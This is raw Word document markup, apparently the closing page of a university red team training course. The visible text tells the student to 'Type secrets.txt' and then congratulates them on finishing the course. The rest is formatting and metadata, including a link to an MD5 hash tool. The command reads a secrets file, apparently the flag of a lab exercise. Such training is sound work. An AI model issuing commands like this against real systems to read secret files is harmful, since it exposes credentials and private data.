    <w:p w14:paraId="67196A19" w14:textId="7031BCB5" w:rsidR="00962BF6" w:rsidRDefault="00962BF6" w:rsidP="00962BF6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24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00336374">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Type secrets.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57239084" w14:textId="222FF3A1" w:rsidR="00962BF6" w:rsidRDefault="00962BF6" w:rsidP="00962BF6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24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00962BF6">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Congratulations! You have finished the red team course!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000F2991" w14:textId="204E43B8" w:rsidR="00962BF6" w:rsidRDefault="00962BF6" w:rsidP="00962BF6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24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00962BF6">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato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7588A842" wp14:editId="5894004B">
            <wp:extent cx="5039428" cy="771633"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="166997263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972637" name="Picture 1" descr="A black background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A02F1" w14:textId="77777777" w:rsidR="00962BF6" w:rsidRPr="00962BF6" w:rsidRDefault="00962BF6" w:rsidP="00962BF6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24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7297888D" w14:textId="68173D4B" w:rsidR="00687203" w:rsidRPr="00CD09BD" w:rsidRDefault="00687203" w:rsidP="00962BF6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24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00687203" w:rsidRPr="00CD09BD">
      <w:headerReference w:type="default" r:id="rId2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404EC5" w14:textId="77777777" w:rsidR="00FB55B2" w:rsidRDefault="00FB55B2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0B04E71B" w14:textId="77777777" w:rsidR="00FB55B2" w:rsidRDefault="00FB55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ace Grotesk">
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:embedRegular r:id="rId1" w:fontKey="{00759D19-1ADA-4302-BA4E-F60D13F2D7ED}"/>
    <w:embedBold r:id="rId2" w:fontKey="{C8D9EDE9-5F0C-4C8A-AD2F-5727DFAE57E0}"/>
    <w:embedItalic r:id="rId3" w:fontKey="{F57C0372-B1DC-4604-82D1-B4C3FD0BC85D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4" w:fontKey="{7DC52D7D-9181-4005-AD1D-0B223EA61A74}"/>
    <w:embedBold r:id="rId5" w:fontKey="{273E023B-E13A-47C8-8B44-A96631E98D2A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0AAFDB1A-99D0-43CF-BE8F-1EB4136ED85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BBBCE956-C0CA-416F-B241-F680711A6FF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AB1D5CDF-9A1B-4A5E-838A-93BD839D94D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847AB09E-4C7A-4069-9F22-311BB037DB0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4D5F32" w14:textId="77777777" w:rsidR="00FB55B2" w:rsidRDefault="00FB55B2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="740C715D" w14:textId="77777777" w:rsidR="00FB55B2" w:rsidRDefault="00FB55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FF1B6" w14:textId="77777777" w:rsidR="00BA1741" w:rsidRDefault="00000000">
    <w:pPr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="010DB605" wp14:editId="060C9D49">
          <wp:extent cx="1252538" cy="36712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538" cy="3671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47058"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="742C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7112D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1DD62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7660B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="26249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8D7B99"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F4FAA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46A50"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9C6C8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2A5439"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BBD20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EA6C8F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="104EC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A068B7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1FD6D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C02959"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FDC03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65090D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ABAA3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4141581">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1014458241">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="156072025">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1745100931">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1798179061">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="172109907">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1207522833">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1867253952">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1943756362">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="14086547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741"/>
    <w:rsid w:val="00027D05"/>
    <w:rsid w:val="0004442B"/>
    <w:rsid w:val="00060BAF"/>
    <w:rsid w:val="00062DAF"/>
    <w:rsid w:val="000E61FA"/>
    <w:rsid w:val="001B5C55"/>
    <w:rsid w:val="00201BF9"/>
    <w:rsid w:val="002672ED"/>
    <w:rsid w:val="00273445"/>
    <w:rsid w:val="002C0DE0"/>
    <w:rsid w:val="002C4F98"/>
    <w:rsid w:val="00322D67"/>
    <w:rsid w:val="003277DA"/>
    <w:rsid w:val="00336374"/>
    <w:rsid w:val="00342BF9"/>
    <w:rsid w:val="003B51D3"/>
    <w:rsid w:val="003E686D"/>
    <w:rsid w:val="00401570"/>
    <w:rsid w:val="00485C07"/>
    <w:rsid w:val="004963C8"/>
    <w:rsid w:val="004A66C9"/>
    <w:rsid w:val="00502783"/>
    <w:rsid w:val="006424B1"/>
    <w:rsid w:val="00644AD4"/>
    <w:rsid w:val="00687203"/>
    <w:rsid w:val="006D5F84"/>
    <w:rsid w:val="006E3621"/>
    <w:rsid w:val="0073176E"/>
    <w:rsid w:val="00772F1E"/>
    <w:rsid w:val="0079375C"/>
    <w:rsid w:val="007A06A7"/>
    <w:rsid w:val="007D4617"/>
    <w:rsid w:val="00844BA2"/>
    <w:rsid w:val="009109DF"/>
    <w:rsid w:val="00917532"/>
    <w:rsid w:val="00927D2C"/>
    <w:rsid w:val="00962BF6"/>
    <w:rsid w:val="009A29B2"/>
    <w:rsid w:val="009A6EE5"/>
    <w:rsid w:val="00A837C4"/>
    <w:rsid w:val="00AA657B"/>
    <w:rsid w:val="00AB6134"/>
    <w:rsid w:val="00AE079A"/>
    <w:rsid w:val="00B9157C"/>
    <w:rsid w:val="00BA1741"/>
    <w:rsid w:val="00BC37F8"/>
    <w:rsid w:val="00C24CBE"/>
    <w:rsid w:val="00C3663A"/>
    <w:rsid w:val="00C72452"/>
    <w:rsid w:val="00CD09BD"/>
    <w:rsid w:val="00CE6BB4"/>
    <w:rsid w:val="00D67007"/>
    <w:rsid w:val="00D977A4"/>
    <w:rsid w:val="00DA26CE"/>
    <w:rsid w:val="00DF2FD7"/>
    <w:rsid w:val="00E61E59"/>
    <w:rsid w:val="00EA40AE"/>
    <w:rsid w:val="00F63A14"/>
    <w:rsid w:val="00F912FB"/>
    <w:rsid w:val="00FB55B2"/>
    <w:rsid w:val="00FD31AB"/>
    <w:rsid w:val="00FF44C8"/>
    <w:rsid w:val="00FF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E39C4"/>
  <w15:docId w15:val="{48436079-5A41-4ADE-9FB7-7201E4E67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pace Grotesk" w:eastAsia="Space Grotesk" w:hAnsi="Space Grotesk" w:cs="Space Grotesk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9A6EE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FD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72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A40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4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0015.io/tools/md5-encrypt-decryp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9ADAE-0041-46C8-9D7E-1A2F50C4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4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State University</Company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l R So</cp:lastModifiedBy>
  <cp:revision>36</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-20T15:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-22T20:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>